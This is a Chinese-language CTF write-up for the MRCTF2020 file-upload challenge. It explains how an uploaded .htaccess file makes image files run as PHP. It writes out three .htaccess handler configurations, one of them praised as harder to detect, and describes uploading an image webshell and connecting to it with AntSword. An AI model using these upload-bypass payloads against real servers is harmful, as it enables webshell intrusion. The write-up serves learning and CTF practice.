[MRCTF2020]你传你呢

0x00 初试

一开始传常规jpg,png啥的都给我封了
在这里插入图片描述
可能限制大小了??很妖 不太理解
由于buu给的链接挂了,所以也看不到源码了…

常规知识点 .htaccess文件解析漏洞

原理

.htaccess文件(或者"分布式配置文件") ,全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法,即,在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

.htaccess重写解析规则 —>上传图片马 解析为php

语法

(推荐使用第二种)
第一种、虽然好用,但是会误伤其他正常文件,容易被发现:

<IfModule mime_module>
AddHandler php5-script .gif #在当前目录下,只针对gif文件会解析成Php代码执行
SetHandler application/x-httpd-php #在当前目录下,所有文件都会被解析成php代码执行
</IfModule>

第二种、精确控制能被解析成php代码的文件,不容易被发现:

<FilesMatch "evil.gif">
SetHandler application/x-httpd-php   #在当前目录下,如果匹配到evil.gif文件,则被解析成PHP代码执行
AddHandler php5-script .gif #在当前目录下,如果匹配到evil.gif文件,则被解析成PHP代码执行
</FilesMatch>

第三种、同1没太大区别:

<IfModule mime_module>
AddType application/x-httpd-php .gif
</IfModule>

参考

https://bbs.huaweicloud.com/blogs/detail/289224

0x01 复现

.htaccess
这么写更精确定位到图片马
在这里插入图片描述
上传时改一下content-type
在这里插入图片描述

上传图片马
在这里插入图片描述
在这里插入图片描述
顺序无所谓
蚁剑连一下 done!

0x02 rethink

联动复习一下SUCTF CheckIn
那一次是上传.user.ini
不适用于本题,因为它其中利用到的预加载的前提是目录下已存在正常php文件

而.htaccess是直接改了解析规则
感兴趣的可以再深入了解一下
关于.htaccess和.user.ini

https://blog.csdn.net/nigo134/article/details/119043586

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值